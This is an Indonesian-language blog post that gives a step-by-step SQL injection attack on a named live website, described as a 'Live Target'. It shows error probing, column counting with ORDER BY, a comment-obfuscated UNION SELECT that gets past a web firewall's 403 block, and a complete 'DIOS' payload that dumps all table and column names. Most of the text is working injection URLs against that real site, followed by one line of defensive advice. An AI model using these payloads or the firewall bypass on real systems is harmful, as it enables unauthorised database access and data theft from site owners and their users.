Sql Injection Bypass 403 Forbidden
Tuesday, November 5, 2019
Edit
Oiya sebelumnya ada yg tau apa itu "Sql Injection?. SQL Injection, adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi.
Oke langsung aja ya, gw ambil buat contoh dari web :https://mvss.in
Bypass Waff: /*!50000UniON+SeLeCt*/
Live Target: https://mvss.in/gallery.php?id=6
Ketika kita menambahkan tanda ' diweb (https://mvss.in/gallery.php?id=6')
dan tampilan akan terlihat/berubah error, itu menandakan web rentan sql injection.
Sekarang kita cek colum database site nya dengan cara order+by di belakang web tadi
example:
https://mvss.in/gallery.php?id=6'+order+by+1--+- not error
https://mvss.in/gallery.php?id=6'+order+by+2--+- error
Nah ini menandakan klo web cuma ada 1 colum.
Sekarang kita urutkan colum tersebut dengan cara union+select dibelakang site nya
https://mvss.in/gallery.php?id=6+union+select+1--+- 403 forbidden
Nah ini yang namanya error 403, saatnya kita kasih bypass waff di belakang site nya
https://mvss.in/gallery.php?id=-6+AND+0+/*!50000UniON+SeLeCt*/+1--+-
Sekarang keliatan kan angka togelnya,
tinggal kasih DIOS aja cuy
DIOS:
(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)
Result:
https://mvss.in/gallery.php?id=-6+AND+0+/*!50000UniON+SeLeCt*/+(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)--+-
Duoor kena print deh database nya:v.
- Agar terhindar dari serangan ini anda wajib memperbaiki Query SQL pada web pribadi dan rutin cek vulnerability web dengan tools pentest, minimal seminggu sekali agar web anda aman